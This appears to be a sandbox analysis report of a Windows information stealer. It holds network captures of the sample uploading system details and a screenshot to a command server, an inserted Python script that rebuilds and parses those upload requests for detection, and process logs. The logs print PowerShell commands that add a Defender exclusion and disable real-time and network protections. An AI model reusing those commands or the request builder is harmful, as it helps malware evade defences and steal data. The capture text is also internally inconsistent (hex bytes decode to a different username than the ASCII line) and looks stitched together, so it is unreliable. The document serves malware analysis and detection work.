Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 7d
Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.75"}


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49720        51.210.106.44   443               1408  C:\Users\user\Desktop\file.exe

Timestamp                Bytes transferred  Direction  Data (on the lines that follow)
2024-11-26 19:38:20 UTC  338                OUT
POST /tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= HTTP/1.1
Host: b.tundara.dev
User-Agent: Go-http-client/1.1
Content-Length: 573
Content-Type: multipart/form-data; boundary=55886a13b9171df724d2ad867f316f6cc583361f023996dbc4ae71c10002
Accept-Encoding: gzip

2024-11-26 19:38:20 UTC  573                OUT
Data Raw: 2d 2d 35 35 38 38 36 61 31 33 62 39 31 37 31 64 66 37 32 34 64 32 61 64 38 36 37 66 33 31 36 66 36 63 63 35 38 33 33 36 31 66 30 32 33 39 39 36 64 62 63 34 61 65 37 31 63 31 30 30 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 79 73 74 65 6d 64 61 74 61 22 0d 0a 0d 0a 7b 22 55 73 65 72 6e 61 6d 65 22 3a 22 66 72 6f 6e 74 64 65 73 6b 22 2c 22 43 6f 6d 70 75 74 65 72 4e 61 6d 65 22 3a 22 46 52 4f 4e 54 44 45 53 4b 2d 50 43 22 2c 22 4f 53 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 22 2c 22 43 50 55 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 47 50 55 22
Data Ascii: --55886a13b9171df724d2ad867f316f6cc583361f023996dbc4ae71c10002Content-Disposition: form-data; name="systemdata"{"Username":"user","ComputerName":"user-PC","OS":"Microsoft Windows 10 Pro","CPU":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","GPU"

2024-11-26 19:38:21 UTC  188                IN
HTTP/1.1 200 OK
Alt-Svc: h3=":443"; ma=2592000
Content-Length: 2
Content-Type: application/json; charset=utf-8
Date: Tue, 26 Nov 2024 19:38:20 GMT
Server: Caddy
Connection: close

2024-11-26 19:38:21 UTC  2                  IN
Data Raw: 22 22
Data Ascii: ""
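
Session 0 above and session 1 below use the same upload shape: a POST from a Go-http-client/1.1 to /tapped/<campaign id>/<base64 blob> on b.tundara.dev, first with a multipart body carrying a "systemdata" JSON part (the host profile), then with an empty "json" part and a "file[]" part named screenshot_0.png. The base64 segment decodes to ec:f4:bb:82:f7:e0 followed by 19882742-CC56-1A59-9779-FB8CBFA1E29D, that is a MAC address and a UUID-shaped value; the report does not say which interface or which GUID the sample reads. The Python below is an added example, not Joe Sandbox output and not the sample's own code: it rebuilds both requests from the captured path, headers, boundaries and field names (the JSON and PNG contents are placeholders, since the report shows only truncated bytes), parses them back into campaign id, victim id and form fields, and lists the features a proxy or IDS rule could match on.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Copied from the capture: C2 path (campaign UUID + base64 victim id), both
# multipart boundaries and the form field names. JSON/PNG contents used below
# are placeholders; the report shows only truncated bytes.
C2_PATH = ("/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/"
           "ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ=")
BOUNDARY_0 = "55886a13b9171df724d2ad867f316f6cc583361f023996dbc4ae71c10002"
BOUNDARY_1 = "d811583238ffff5cd4747165f3ed0953225391cced4601799c47e9abb75e"

TAPPED_RE = re.compile(r"^/tapped/(?P<campaign>[^/]+)/(?P<victim>[^/]+)$")
UUID_RE = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
MAC_RE = re.compile(r"^(?:[0-9a-f]{2}:){5}[0-9a-f]{2}$", re.I)


def build_request(path, boundary, parts):
    """Assemble a Go net/http style multipart POST (constructed sample input)."""
    body = b""
    for name, filename, content in parts:
        disp = f'form-data; name="{name}"'
        if filename:
            disp += f'; filename="{filename}"'
        body += f"--{boundary}\r\nContent-Disposition: {disp}\r\n\r\n".encode()
        body += content + b"\r\n"
    body += f"--{boundary}--\r\n".encode()
    head = (f"POST {path} HTTP/1.1\r\nHost: b.tundara.dev\r\n"
            f"User-Agent: Go-http-client/1.1\r\nContent-Length: {len(body)}\r\n"
            f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
            f"Accept-Encoding: gzip\r\n\r\n")
    return head.encode() + body


# Session 0 sends a "systemdata" JSON part; session 1 an empty "json" part
# plus the screenshot as "file[]" (field layout as seen in the capture).
SESSION0_REQUEST = build_request(C2_PATH, BOUNDARY_0, [
    ("systemdata", None, b'{"Username":"<placeholder>","OS":"<placeholder>"}')])
SESSION1_REQUEST = build_request(C2_PATH, BOUNDARY_1, [
    ("json", None, b""),
    ("file[]", "screenshot_0.png", b"\x89PNG\r\n\x1a\n<placeholder png bytes>")])


@dataclass
class Upload:
    campaign_id: str
    victim_raw: str                 # decoded base64 path segment
    victim_mac: Optional[str]       # leading 17 chars when they form a MAC
    victim_uuid: Optional[str]      # trailing 36 chars when they form a UUID
    fields: list = field(default_factory=list)      # (name, filename) per part
    indicators: list = field(default_factory=list)  # detection features seen


def decode_victim_id(segment):
    """Base64-decode the path segment and try the MAC+UUID split (by shape only)."""
    raw = base64.b64decode(segment).decode("ascii")
    mac, rest = raw[:17], raw[17:]
    if MAC_RE.match(mac) and UUID_RE.match(rest):
        return raw, mac, rest
    return raw, None, None


def multipart_fields(body, boundary):
    """Return (name, filename) for each part; filename is None for plain fields."""
    out = []
    for part in body.split(b"--" + boundary.encode())[1:]:
        if part.startswith(b"--"):           # closing delimiter reached
            break
        head = part.split(b"\r\n\r\n", 1)[0].decode("latin-1")
        name = re.search(r';\s*name="([^"]*)"', head)
        fname = re.search(r';\s*filename="([^"]*)"', head)
        if name:
            out.append((name.group(1), fname.group(1) if fname else None))
    return out


def parse_upload(raw):
    """Parse one captured request; returns None if it is not a POST to /tapped/."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {k.lower(): v for k, _, v in (l.partition(": ") for l in lines[1:])}
    m = TAPPED_RE.match(path)
    if method != "POST" or not m:
        return None
    raw_id, mac, uid = decode_victim_id(m.group("victim"))
    up = Upload(m.group("campaign"), raw_id, mac, uid)
    bm = re.search(r"boundary=([^;\s]+)", headers.get("content-type", ""))
    if bm:
        up.fields = multipart_fields(body, bm.group(1))
    # Features a proxy/IDS rule could key on; all are visible in the capture.
    if headers.get("user-agent", "").startswith("Go-http-client/"):
        up.indicators.append("go-http-client user-agent")
    if UUID_RE.match(up.campaign_id):
        up.indicators.append("uuid campaign segment")
    if mac and uid:
        up.indicators.append("base64(mac+uuid) victim segment")
    if any(name == "file[]" for name, _ in up.fields):
        up.indicators.append("file[] upload part")
    return up
```

parse_upload() returns None for requests that are not /tapped/ POSTs (the ip-api.com GET, for instance), so it can be run unchanged over every request in a capture. The MAC/UUID split is done by shape only and falls back to the raw decoded string when either half does not match, so an operator-side change to the victim id format degrades to "unknown" rather than a parse failure.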


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.7  49729        51.210.106.44   443               1408  C:\Users\user\Desktop\file.exe

Timestamp                Bytes transferred  Direction  Data (on the lines that follow)
2024-11-26 19:38:23 UTC  341                OUT
POST /tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= HTTP/1.1
Host: b.tundara.dev
User-Agent: Go-http-client/1.1
Content-Length: 437402
Content-Type: multipart/form-data; boundary=d811583238ffff5cd4747165f3ed0953225391cced4601799c47e9abb75e
Accept-Encoding: gzip

2024-11-26 19:38:23 UTC  845                OUT
Data Raw: 2d 2d 64 38 31 31 35 38 33 32 33 38 66 66 66 66 35 63 64 34 37 34 37 31 36 35 66 33 65 64 30 39 35 33 32 32 35 33 39 31 63 63 65 64 34 36 30 31 37 39 39 63 34 37 65 39 61 62 62 37 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6a 73 6f 6e 22 0d 0a 0d 0a 0d 0a 2d 2d 64 38 31 31 35 38 33 32 33 38 66 66 66 66 35 63 64 34 37 34 37 31 36 35 66 33 65 64 30 39 35 33 32 32 35 33 39 31 63 63 65 64 34 36 30 31 37 39 39 63 34 37 65 39 61 62 62 37 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5b 5d 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 73 63 72 65 65 6e 73 68 6f 74 5f 30 2e 70 6e 67 22 0d 0a 43 6f
Data Ascii: --d811583238ffff5cd4747165f3ed0953225391cced4601799c47e9abb75eContent-Disposition: form-data; name="json"--d811583238ffff5cd4747165f3ed0953225391cced4601799c47e9abb75eContent-Disposition: form-data; name="file[]"; filename="screenshot_0.png"Co

2024-11-26 19:38:23 UTC  2372               OUT
Data Raw: 91 75 85 91 97 33 eb c5 1c db d0 ee 8e 4e b0 38 52 0c 78 7d 77 19 76 63 8c 8c a1 0c 02 a6 00 97 f3 74 4b 0b 72 da 20 4e 54 2f f2 52 e4 4f 1e 01 1e 2e 19 9c 34 4d b1 c0 8a d9 1c 8f 6d 79 3c cb b2 a4 94 34 4d 45 1f 0c a9 28 50 4c 4d 96 61 e1 e1 9d 20 6b 40 ee 9b d7 52 69 62 93 aa e3 a5 38 e7 26 93 49 9e a6 ab e7 9d 87 33 b9 41 f4 14 57 f1 f0 ca 9f 68 3f 49 12 63 4c d1 60 a9 00 c6 0d 83 69 bd a5 22 1a 1a 63 d2 34 1d 0e 87 49 92 8c 46 a3 d6 42 ad fb 25 9f b3 49 8a 79 c4 ad 65 4c d4 f3 8b 0f 32 5c 59 29 a2 24 3f a4 b2 c2 65 b4 e5 21 c2 72 e2 1b a5 69 9a 95 43 9d 24 89 dc 57 46 03 bf 9b fc 2f bf 48 31 8c fc 94 e1 f5 a5 9e 1a f5 c6 2b df 5d a9 2c 12 4c 4d 6c ab 06 65 9c 07 83 41 92 24 d2 3b e9 ac f4 48 de 00 d2 b2 5c 28 fa 17 3a d7 63 55 8c 46 f8 ad b4 94 a5 ec
Data Ascii: u3N8Rx}wvctKr NT/RO.4Mmy<4ME(PLMa k@Rib8&I3AWh?IcL`i"c4IFB%IyeL2\Y)$?e!riC$WF/H1+],LMleA$;H\(:cUF

2024-11-26 19:38:23 UTC  538                OUT
Data Raw: ea 74 d0 92 84 b6 cc 4a 6b 15 16 52 a8 55 4e e0 18 5a b4 8f ac d1 be cd 85 19 33 55 00 89 cb f3 34 0e c6 75 2e 5c 8e 8c ed f2 2c 55 b0 93 17 bf 8b ac 5a 8a 2a cd 2f 07 81 c7 71 3c 2e 8b f4 60 88 00 c8 2b ec 91 37 e4 a1 88 94 a8 51 8c fa 60 30 80 cb 37 3f 02 b8 23 ba cc 34 be 2c 24 11 21 fd ca 64 48 16 4e b0 58 7b 0c d1 d5 74 73 3a 28 71 d3 95 a4 4a 1c 6f cc 0b 18 5d 83 4f b5 22 4e 7d b2 d4 8f a4 75 ce 0d 87 43 3c dd ec 0c cc 64 b2 c2 de 3c 7d 0d 81 e9 74 4c 7b bb 08 96 55 78 5e 06 9f 53 ac 01 51 2b 46 d4 b4 9d c0 79 46 40 ea fa 49 bf 9d d5 b4 30 fa a5 06 84 cb 35 f9 cf 5d 5a 25 d5 b3 6c 95 90 64 6f b0 41 48 a2 3b 61 7a b3 12 18 33 33 9c 65 d9 fa 99 33 c9 60 00 33 87 6f ee e1 f4 69 e2 e4 6f ed ef 9e d8 99 ad a1 eb f0 32 9a 51 91 0d 29 9d e6 86 bd ae 3e 3b
Data Ascii: tJkRUNZ3U4u.\,UZ*/q<.`+7Q`07?#4,$!dHNX{ts:(qJo]O"N}uC<d<}tL{Ux^SQ+FyF@I05]Z%ldoAH;az33e3`3oio2Q)>;

2024-11-26 19:38:23 UTC  4744               OUT
Data Raw: cf 84 99 5b c6 d8 ba 60 72 4d e1 e1 76 48 ba a3 6c 0a 7e 8f 70 a3 38 b1 0a cd 62 c6 b9 66 2c bc 73 15 74 69 86 2e 77 fe 20 97 53 33 04 9f 8c 92 30 9c 4e 59 95 fc f5 9f 2f 18 02 90 5b 48 81 19 f1 6a 96 1c bc a2 a7 58 1f 84 e7 57 ab 85 b3 13 2b b7 5e 55 5f 5a 3e 4b bd 59 69 bc 00 db e5 55 59 96 89 a3 b2 ac 52 5c 28 2b d8 e7 45 45 b1 24 49 06 83 c1 68 34 12 fc 29 3a 8c d6 27 d0 47 80 13 fb b1 2b 52 9a 59 4d 9e 08 50 91 ac 89 aa 74 05 13 89 8c e7 ca ca 4a 56 42 6d 5c ce fe fc a0 bb a5 a7 15 b9 3a 18 a8 f1 2f c0 5e 14 03 d3 82 28 1e 0c 06 d2 14 e2 9f b1 78 38 1b 36 af 16 4b c2 a9 b0 40 1a 0b e0 1c 94 32 1a 8d 98 aa c5 55 ce b9 d8 58 2e 37 85 5b 70 08 00 9e 20 ac 07 b5 1a 91 72 5c 3d 8f bc 27 51 ef 19 eb 2d fe fa 70 cb 16 c0 3e ff ca 10 56 79 0a f8 cf ff 82 a5
Data Ascii: [`rMvHl~p8bf,sti.w S30NY/[HjXW+^U_Z>KYiUYR\(+EE$Ih4):'G+RYMPtJVBm\:/^(x86K@2UX.7[p r\='Q-p>Vy

2024-11-26 19:38:23 UTC  5930               OUT
Data Raw: b5 f3 ac a4 eb e3 61 f9 b4 0f ca 3a 58 89 38 9e 94 b9 b5 37 9d 04 cb 18 23 48 d8 18 73 fe 4a fc a2 ab 2e 9d 86 13 c6 5a 95 fe fa 5f 3c f5 92 7d 4f b9 64 75 5f ba 76 f8 be 07 3e fc e9 af 7d f6 cc 7e 63 3a aa d4 76 ba 96 2d 6a 83 c2 78 36 33 e9 31 9b 1c 3c ff b2 7f 7e e6 e8 ad d9 a9 43 c6 58 67 eb 40 5f 71 77 76 12 d5 e2 c4 21 a9 8c 09 46 72 ac 3d 2c f6 0b b7 45 9f fa 78 fe 8c 67 47 6f 7b 4b fe f2 57 4d 75 cd 81 83 f9 cb 5f 15 fd d2 eb 9f fd 0f 9f dc 72 fd 96 72 ae 8a e0 81 ae 2c ca 1b ee 68 37 1f 74 10 06 24 f2 52 de 4c bb 4b 59 ca 39 2f fe b3 99 97 15 18 4c ae 19 fb 7e 09 c2 ce 1e 80 d7 a5 00 73 d1 d3 5c a2 9c 63 7b fa c5 e4 64 50 79 f5 27 07 b5 f6 6b d5 f2 77 ad 8f 60 57 8d 8d 32 dc 2f 8d 17 94 18 c0 f6 5e 69 59 c6 66 bc d5 ae 73 1f 07 9c bd 7d 0f 0e e5
Data Ascii: a:X87#HsJ.Z_<}Odu_v>}~c:v-jx631<~CXg@_qwv!Fr=,ExgGo{KWMu_rr,h7t$RLKY9/L~s\c{dPy'kw`W2/^iYfs}

2024-11-26 19:38:23 UTC  7116               OUT
Data Raw: 5f f9 a5 f3 85 6c 23 f0 b5 e5 ea 47 58 ff 25 c3 19 2b f4 ce b0 90 85 2f f4 2d 77 2a 43 15 f3 f3 ea fd c3 61 05 ca 2f 9a 5d 91 bd d8 f8 5c 4d 28 7b 5c 63 84 d5 f3 c5 23 56 95 e9 ca 27 41 43 49 d7 a4 6c 0a 00 8b ac a5 46 d0 af 31 e6 d6 a3 f9 8d c6 ec 4f a2 a7 5d e4 3e 7b 9f bd f5 68 75 fc ea 87 c5 f3 35 fe f5 ec fc 99 af 91 1e 2e ec 87 b3 4d f9 82 d1 35 28 35 6e 6c 9d 0d cb 48 ca 04 5b 27 7f 36 54 06 69 af 49 fc 9f 7f 3a fa ad b7 b8 27 5e 25 7f 66 3f f1 b3 da bd f9 c0 c1 ec e7 df 98 fd fc 1b ed df 7c a2 f8 f3 f2 b3 aa 3e f0 8e ef 02 77 4a ce d6 8e ef 92 3d 3d 1f 39 2b c7 19 32 37 74 e9 1f 99 b3 7e dc 76 83 ec d4 20 2f d6 4e ba 99 5e 74 6d 10 7b ee 35 d3 71 1f 3a 4e 73 17 ff 9c 68 50 e1 10 e5 40 8b b4 bd 50 a3 ba 97 57 57 59 44 b2 04 ab 9d ba da 3e f2 7e d7
Data Ascii: _l#GX%+/-w*Ca/]\M({\c#V'ACIlF1O]>{hu5.M5(5nlH['6TiI:'^%f?|>wJ==9+27t~v /N^tm{5q:NshP@PWWYD>~

2024-11-26 19:38:23 UTC  8302               OUT
Data Raw: c7 3e f6 a7 7f fa a7 37 dc 70 83 1c d9 29 17 e8 3d 27 bb 36 cb eb 02 65 8e 12 9d be 2c d9 e0 99 96 ca 5e 59 57 4b 3d 67 55 23 78 7c e7 35 5b 4a 29 fe a6 9c 3f 34 6f c2 9a 31 0b e2 2e 1f 2d f8 80 59 dd 2e e8 da 67 e9 1c 55 2e 55 35 a2 78 5a f9 8c 22 ab 3e 49 9b 4d 26 36 14 03 1c ce ba 5c bb 04 33 17 5a 5c 48 f4 97 a2 49 59 4f de 10 5b db 99 ed 96 71 ac 3f 26 53 4a 57 70 b5 47 78 6a f4 c5 15 74 ca 24 5b 03 9e 53 76 f3 56 5b 7f f9 97 43 85 55 bd 22 80 de 0d 69 7c c6 c0 3c b3 05 f0 cb d3 95 95 15 49 83 2c 29 97 8c 31 eb eb eb 92 8a 49 25 0d 2a f3 95 59 4e ed ab 8c 05 6a 9d 14 fa 18 0b 50 cd 14 9f 62 92 89 99 d4 af 53 c6 90 2a a4 33 c8 a9 02 97 2a 36 1e 85 8e 78 b2 fc 25 0d 07 6f 41 92 7e e5 21 75 23 f5 08 8b 45 00 73 0a 78 ec 83 2b 46 8c 42 a1 23 d7 17 67 fc
                                                                                                                            Data Ascii: >7p)='6e,^YWK=gU#x|5[J)?4o1.-Y.gU.U5xZ">IM&6\3Z\HIYO[q?&SJWpGxjt$[SvV[CU"i|<I,)1I%*YNjPbS*3*6x%oA~!u#Esx+FB#g
                                                                                                                            2024-11-26 19:38:23 UTC6676OUTData Raw: df 74 e3 4b ec b3 5e 72 ed 3b 47 af be f1 3b 9e 51 9c fc d5 fe 83 f6 17 3e f3 bc 97 3d e3 15 77 de 62 ee fc 5a 75 f0 5f bf d6 be fc 37 9e ff 89 e3 65 83 df ac af 1d bf fa c6 c7 3c f3 f0 ed e5 b8 b5 49 d7 02 00 97 a3 fa ad db cd d1 c3 e5 7f e5 9f 77 c9 8d 0e 7f ed 92 7f 75 f3 65 b7 98 c3 b7 95 ff 1d a6 af ce 98 43 b7 98 3b 6f 79 c5 8d 2f 7a c1 a7 df 6e 7f f6 43 d5 1d 7f e4 25 f6 ba 97 d8 ff e7 33 cf 7b d9 3f 79 79 a5 ed 9a 39 72 9b b9 ff 70 31 3b 82 7e cd be af be f9 79 df f5 87 af 8d fe f7 37 46 2f fb 4d fb 9b e6 45 4f 3f f6 d6 0f 7f e6 b1 0f 39 65 ee ba 5d ee f5 8a c7 3d e2 83 1f 7e 8f f9 f2 2d e6 51 4f 74 ff 6e df 9b 6e 7a ad fd fe d7 da ef ff ef 1f f8 ff d9 7b 17 70 cb ae aa 4c 74 ce b5 f6 de a7 1e 49 3d 48 05 82 92 3a 15 20 41 02 a9 44 3f 68 9a 04 02
                                                                                                                            Data Ascii: tK^r;G;Q>=wbZu_7e<IwueC;oy/znC%3{?yy9rp1;~y7F/MEO?9e]=~-QOtnnz{pLtI=H: AD?h
                                                                                                                            2024-11-26 19:38:23 UTC10674OUTData Raw: f0 c2 1a 60 84 7d 49 0c 95 8f d5 8b 51 5a df ae 81 32 2a 75 dc 52 30 d9 f3 53 33 75 89 91 fb e6 72 eb ef 9a b6 fb ba d9 ce 39 1f 0c 58 02 60 4e f4 22 48 12 43 03 a0 5e 8e 80 10 ac d8 8f a6 26 84 f0 c1 5d 63 8b 61 c8 aa be d7 b4 17 83 85 b8 4f f5 90 b5 b6 73 c5 bd 6c f1 6b ee f0 4f 24 d3 04 9b 14 12 b4 da da 3e 1b 99 4f 4d 42 a2 26 f9 1b ba 7f 30 a0 74 53 a0 6a 4a 37 95 26 e2 69 8c 81 03 10 8a 50 6b 7b 9d 2e 87 7a 22 c5 8a 30 3f a8 19 e7 5c af d3 45 4c 88 05 46 26 27 40 0b 4c d3 4a f3 21 ea bd 4c c0 35 85 fc 43 68 40 11 b3 5d 63 54 64 08 99 3e ad 43 29 2b 12 05 07 cc e6 72 dd 1e 91 36 36 ba d9 13 e9 70 74 3a 2b 6e 6a 81 eb 5c 95 99 a9 6c 64 87 ea e5 84 43 d4 59 0e fe c4 85 63 7c 2c 6c 18 e9 b3 63 65 68 2e fa 93 e2 36 d1 ea a3 0c 40 3e 82 77 97 bd be c5 7a
                                                                                                                            Data Ascii: `}IQZ2*uR0S3ur9X`N"HC^&]caOslkO$>OMB&0tSjJ7&iPk{.z"0?\ELF&'@LJ!L5Ch@]cTd>C)+r66pt:+nj\ldCYc|,lceh.6@>wz
                                                                                                                            2024-11-26 19:38:23 UTC11860OUTData Raw: a0 35 96 cc 86 06 bd 04 b0 3d 88 bd d1 30 44 17 e0 28 74 3a 9d c1 30 c3 69 19 85 d3 62 dd 45 5d 2a f4 8d 5a 70 e6 eb 27 24 2a 8d 35 20 b4 24 a6 1c a9 88 9b a4 3f 70 ea 26 52 e3 e9 08 80 4f f3 f7 f4 a2 12 3d f8 81 9f e9 21 5b 00 71 3a 6d 52 cf 1f 58 bd 3f c8 1d ca bf ff ab 85 64 8c 4d 52 93 fa a0 59 36 37 b9 75 2e f3 b1 1b 33 79 12 63 0d 60 e0 99 cc 64 26 33 59 53 92 37 67 56 3b 25 a5 e9 7d 3d 2e 8c 24 d3 aa 75 e1 85 b2 1c af 95 8a 12 a7 a6 f9 80 32 a6 0e 8c d1 3d 6f 94 d2 c4 9f 08 c3 72 eb 5a ba 10 45 7a 2c 51 ea 5e 73 fb b6 cc 04 1b 6d 12 92 87 94 06 c9 78 48 9c c0 f6 17 71 9d d8 2b b3 97 69 94 9c 64 50 c7 2e b2 9c 37 25 8c 63 7d bf 11 08 a5 dc 21 bd ac 5d 79 b9 19 22 0f 30 c3 89 90 fe a7 ee b5 cb bb f0 a6 4d bf 86 1f 98 0b 07 03 f3 b2 d5 40 90 84 8c 43
                                                                                                                            Data Ascii: 5=0D(t:0ibE]*Zp'$*5 $?p&RO=![q:mRX?dMRY67u.3yc`d&3YS7gV;%}=.$u2=orZEz,Q^smxHq+idP.7%c}!]y"0M@C
                                                                                                                            2024-11-26 19:38:24 UTC188INHTTP/1.1 200 OK
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                            Content-Length: 2
                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                            Date: Tue, 26 Nov 2024 19:38:24 GMT
                                                                                                                            Server: Caddy
                                                                                                                            Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.7  49728        51.210.106.44   443               1408  C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-26 19:38:23 UTC | 262 | OUT | GET /ws?id=ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= HTTP/1.1
Host: w.tundara.dev
User-Agent: Go-http-client/1.1
Connection: Upgrade
Sec-WebSocket-Key: +ck7nJwhsfDtHrCBl6ZoOw==
Sec-WebSocket-Version: 13
Upgrade: websocket
2024-11-26 19:38:23 UTC | 252 | IN | HTTP/1.1 400 Bad Request
Alt-Svc: h3=":443"; ma=2592000
Content-Length: 40
Content-Type: text/plain; charset=utf-8
Date: Tue, 26 Nov 2024 19:38:23 GMT
Sec-Websocket-Version: 13
Server: Caddy
X-Content-Type-Options: nosniff
Connection: close
2024-11-26 19:38:23 UTC | 40 | IN | Data Raw: 42 61 64 20 52 65 71 75 65 73 74 0a 7b 22 65 72 72 6f 72 22 3a 22 45 72 72 65 75 72 20 57 65 62 53 6f 63 6b 65 74 22 7d
Data Ascii: Bad Request{"error":"Erreur WebSocket"}


                                                                                                                            Target ID:0
                                                                                                                            Start time:14:37:57
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                            Imagebase:0x7ff608fb0000
                                                                                                                            File size:26'987'008 bytes
                                                                                                                            MD5 hash:9096F57FA44B8F20EEBF2008A9598EEC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_CerbfyneStealer, Description: Yara detected Cerbfyne Stealer, Source: 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CerbfyneStealer, Description: Yara detected Cerbfyne Stealer, Source: 00000000.00000000.1232496497.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:2
                                                                                                                            Start time:14:37:58
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe
                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:3
                                                                                                                            Start time:14:37:58
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:6
                                                                                                                            Start time:14:38:01
                                                                                                                            Start date:26/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
